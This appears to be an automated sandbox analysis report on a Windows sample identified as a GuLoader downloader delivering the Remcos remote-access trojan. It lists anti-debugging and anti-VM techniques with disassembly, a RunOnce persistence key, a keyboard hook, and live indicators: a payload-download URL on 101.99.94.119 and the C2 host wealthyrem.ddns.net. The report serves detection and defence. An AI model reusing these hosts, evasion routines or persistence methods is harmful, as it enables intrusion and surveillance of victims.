Source: pRcHGlVekw.exe, 00000001.00000002.344662425.0000000002190000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll\UNDERDEVELOPED.exe\HOMOTYPYSoftware\Microsoft\Windows\CurrentVersion\RunOnceDRAWSPAN
Source: pRcHGlVekw.exe, 00000001.00000002.344662425.0000000002190000.00000004.00000001.sdmp, pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

System information queried: ModuleInformation

Jump to behavior

Anti Debugging:

Hides threads from debuggers

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Thread information set: HideFromDebugger	Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Code function: 1_2_02187EB3 rdtsc

1_2_02187EB3

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Code function: 1_2_02186663 LdrInitializeThunk,

1_2_02186663

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02188817 mov eax, dword ptr fs:[00000030h]	1_2_02188817
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02182EC2 mov eax, dword ptr fs:[00000030h]	1_2_02182EC2
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02187540 mov eax, dword ptr fs:[00000030h]	1_2_02187540
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02183944 mov eax, dword ptr fs:[00000030h]	1_2_02183944
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02187BB8 mov eax, dword ptr fs:[00000030h]	1_2_02187BB8
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021855ED mov eax, dword ptr fs:[00000030h]	1_2_021855ED

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Process created: C:\Users\user\Desktop\pRcHGlVekw.exe 'C:\Users\user\Desktop\pRcHGlVekw.exe'

Jump to behavior

Source: pRcHGlVekw.exe, 00000010.00000002.1300934977.0000000000FB0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: pRcHGlVekw.exe, 00000010.00000002.1300934977.0000000000FB0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: pRcHGlVekw.exe, 00000010.00000002.1300934977.0000000000FB0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: logs.dat.16.dr	Binary or memory string: [ Program Manager ]
Source: pRcHGlVekw.exe, 00000010.00000002.1300934977.0000000000FB0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Stealing of Sensitive Information:

GuLoader behavior detected

Source: Initial file

Signature Results: GuLoader behavior

Yara detected Remcos RAT

Source: Yara match

File source: 00000010.00000002.1300727955.00000000008E8000.00000004.00000020.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Remcos RAT

Source: Yara match

File source: 00000010.00000002.1300727955.00000000008E8000.00000004.00000020.sdmp, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
194.5.97.128	wealthyrem.ddns.net	Netherlands		208476	DANILENKODE	true
101.99.94.119	unknown	Malaysia		45839	SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY	true

Private

IP
192.168.2.1

Contacted Domains

Name	IP	Active
wealthyrem.ddns.net	194.5.97.128	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://101.99.94.119/WEALTH_fkWglQyCXO188.binkw	true	Avira URL Cloud: safe	unknown
http://101.99.94.119/WEALTH_fkWglQyCXO188.bin	true	Avira URL Cloud: safe	unknown

AV Detection:

Found malware configuration

Source: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_fkWglQyCXO188.binkw"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.exe

ReversingLabs: Detection: 17%

Multi AV Scanner detection for submitted file

Source: pRcHGlVekw.exe

ReversingLabs: Detection: 17%

Yara detected Remcos RAT

Source: Yara match

File source: 00000010.00000002.1300727955.00000000008E8000.00000004.00000020.sdmp, type: MEMORY

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: pRcHGlVekw.exe

Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files

Source: pRcHGlVekw.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://101.99.94.119/WEALTH_fkWglQyCXO188.binkw

Uses dynamic DNS services

Source: unknown

DNS query: name: wealthyrem.ddns.net

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.3:49737 -> 194.5.97.128:39200

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 194.5.97.128 194.5.97.128
Source: Joe Sandbox View	IP Address: 101.99.94.119 101.99.94.119

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: DANILENKODE DANILENKODE
Source: Joe Sandbox View	ASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119

Source: global traffic

HTTP traffic detected: GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: wealthyrem.ddns.net

Source: pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp	String found in binary or memory: http://101.99.94.119/WEALTH_fkWglQyCXO188.bin
Source: pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp	String found in binary or memory: http://101.99.94.119/WEALTH_fkWglQyCXO188.binwininet.dllMozilla/5.0

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\pRcHGlVekw.exe

Jump to behavior

E-Banking Fraud:

Yara detected Remcos RAT

Source: Yara match

File source: 00000010.00000002.1300727955.00000000008E8000.00000004.00000020.sdmp, type: MEMORY

System Summary:

Abnormal high CPU Usage

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Process Stats: CPU usage > 98%

Contains functionality to call native functions

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218929D NtProtectVirtualMemory,	1_2_0218929D
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218435F NtWriteVirtualMemory,	1_2_0218435F
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021859E6 NtAllocateVirtualMemory,	1_2_021859E6
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02185A22 NtAllocateVirtualMemory,	1_2_02185A22
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218486E NtWriteVirtualMemory,	1_2_0218486E
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021846AC NtWriteVirtualMemory,	1_2_021846AC
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02184CFA NtWriteVirtualMemory,	1_2_02184CFA
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218914B NtProtectVirtualMemory,	1_2_0218914B
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02185564 NtWriteVirtualMemory,TerminateProcess,	1_2_02185564
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02181766 NtWriteVirtualMemory,	1_2_02181766
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02183DA0 NtWriteVirtualMemory,	1_2_02183DA0

Detected potential crypto function

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218561A	1_2_0218561A
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218226F	1_2_0218226F
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02180E63	1_2_02180E63
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02189695	1_2_02189695
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021806BF	1_2_021806BF
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218435F	1_2_0218435F
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02188817	1_2_02188817
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02183A2B	1_2_02183A2B
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02182021	1_2_02182021
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02188053	1_2_02188053
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02180248	1_2_02180248
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218486E	1_2_0218486E
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218086F	1_2_0218086F
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02185E60	1_2_02185E60
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02182A67	1_2_02182A67
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02185E67	1_2_02185E67
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02187C9A	1_2_02187C9A
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021896A8	1_2_021896A8
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021846AC	1_2_021846AC
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021886D9	1_2_021886D9
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02180CDF	1_2_02180CDF
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02182EC2	1_2_02182EC2
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02184CFA	1_2_02184CFA
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021810F0	1_2_021810F0
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02180CE4	1_2_02180CE4
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02183B1F	1_2_02183B1F
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02184111	1_2_02184111
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02181113	1_2_02181113
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02181136	1_2_02181136
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02183123	1_2_02183123
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02182B4B	1_2_02182B4B
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02183944	1_2_02183944
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02182F76	1_2_02182F76
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02185D6E	1_2_02185D6E
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02188960	1_2_02188960
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02185564	1_2_02185564
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02181766	1_2_02181766
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02181BBB	1_2_02181BBB
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02183DA0	1_2_02183DA0
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021879D6	1_2_021879D6
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021807F2	1_2_021807F2
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02180DF4	1_2_02180DF4
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021803F6	1_2_021803F6

PE file contains strange resources

Source: pRcHGlVekw.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: pRcHGlVekw.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UNDERDEVELOPED.exe.16.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UNDERDEVELOPED.exe.16.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Sample file is different than original file name gathered from version info

Source: pRcHGlVekw.exe, 00000001.00000000.219062533.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameLIEGEMAN.exe vs pRcHGlVekw.exe
Source: pRcHGlVekw.exe, 00000001.00000002.344452128.0000000002090000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs pRcHGlVekw.exe
Source: pRcHGlVekw.exe, 00000010.00000002.1306296984.000000001DD60000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs pRcHGlVekw.exe
Source: pRcHGlVekw.exe, 00000010.00000000.341877354.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameLIEGEMAN.exe vs pRcHGlVekw.exe
Source: pRcHGlVekw.exe	Binary or memory string: OriginalFilenameLIEGEMAN.exe vs pRcHGlVekw.exe

Uses 32bit PE files

Source: pRcHGlVekw.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/3@175/3

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

File created: C:\Users\user\AppData\Roaming\remcos

Jump to behavior

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Mutant created: \Sessions\1\BaseNamedObjects\Remcos-FAZALZ

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

File created: C:\Users\user\AppData\Local\Temp\~DF4931134DE445F613.TMP

Jump to behavior

Source: pRcHGlVekw.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: pRcHGlVekw.exe

ReversingLabs: Detection: 17%

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

File read: C:\Users\user\Desktop\pRcHGlVekw.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\pRcHGlVekw.exe 'C:\Users\user\Desktop\pRcHGlVekw.exe'
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process created: C:\Users\user\Desktop\pRcHGlVekw.exe 'C:\Users\user\Desktop\pRcHGlVekw.exe'
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process created: C:\Users\user\Desktop\pRcHGlVekw.exe 'C:\Users\user\Desktop\pRcHGlVekw.exe'	Jump to behavior

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Source: Yara match

File source: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_00407108 push ebp; retf	1_2_00407109
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218A033 push ds; retf	1_2_0218A036
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218A037 push ds; retf	1_2_0218A03A
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218A02B push ds; retf	1_2_0218A02E
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218A02F push ds; retf	1_2_0218A032
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218A027 push ds; retf	1_2_0218A02A
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 16_2_0056A037 push ds; retf	16_2_0056A03A
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 16_2_0056A033 push ds; retf	16_2_0056A036
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 16_2_0056A027 push ds; retf	16_2_0056A02A
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 16_2_0056A02F push ds; retf	16_2_0056A032
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 16_2_0056A02B push ds; retf	16_2_0056A02E

Source: initial sample	Static PE information: section name: .text entropy: 7.08042704515
Source: initial sample	Static PE information: section name: .text entropy: 7.08042704515

Persistence and Installation Behavior:

Drops PE files

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

File created: C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.exe

Jump to dropped file

Boot Survival:

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.vbs			Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.vbs			Jump to behavior

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN	Jump to behavior

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect Any.run

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=\UNDERDEVELOPED.EXE\HOMOTYPYSET W = CREATEOBJECT("WSCRIPT.SHELL")
Source: pRcHGlVekw.exe, 00000001.00000002.344662425.0000000002190000.00000004.00000001.sdmp, pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: pRcHGlVekw.exe, 00000001.00000002.344662425.0000000002190000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL\UNDERDEVELOPED.EXE\HOMOTYPYSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCEDRAWSPAN

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	RDTSC instruction interceptor: First address: 0000000002187EBB second address: 0000000002187EBB instructions: 0x00000000 rdtsc 0x00000002 mov eax, 01B6460Dh 0x00000007 xor eax, BEFED3B1h 0x0000000c sub eax, 17554910h 0x00000011 add eax, 580CB355h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007F4E1C9F6F80h 0x0000001e lfence 0x00000021 mov edx, 1889B9A2h 0x00000026 xor edx, A7C3F6EDh 0x0000002c add edx, 20E9D255h 0x00000032 xor edx, 9FCA21B0h 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d test dh, 0000006Eh 0x00000040 test cx, cx 0x00000043 cmp cx, dx 0x00000046 ret 0x00000047 sub edx, esi 0x00000049 ret 0x0000004a test dh, ah 0x0000004c add edi, edx 0x0000004e dec dword ptr [ebp+000000F8h] 0x00000054 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000005b jne 00007F4E1C9F6E7Ah 0x0000005d call 00007F4E1C9F6EDDh 0x00000062 call 00007F4E1C9F6FA1h 0x00000067 lfence 0x0000006a mov edx, 1889B9A2h 0x0000006f xor edx, A7C3F6EDh 0x00000075 add edx, 20E9D255h 0x0000007b xor edx, 9FCA21B0h 0x00000081 mov edx, dword ptr [edx] 0x00000083 lfence 0x00000086 test dh, 0000006Eh 0x00000089 test cx, cx 0x0000008c cmp cx, dx 0x0000008f ret 0x00000090 mov esi, edx 0x00000092 pushad 0x00000093 rdtsc
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	RDTSC instruction interceptor: First address: 0000000002187FF6 second address: 0000000002187FF6 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, DFFADC29h 0x00000013 xor eax, 5D423971h 0x00000018 xor eax, 6D1D2D19h 0x0000001d add eax, 105A37C0h 0x00000022 cpuid 0x00000024 psubd mm7, mm2 0x00000027 bt ecx, 1Fh 0x0000002b jc 00007F4E1C91B0F3h 0x00000031 popad 0x00000032 call 00007F4E1C91ABBEh 0x00000037 lfence 0x0000003a rdtsc
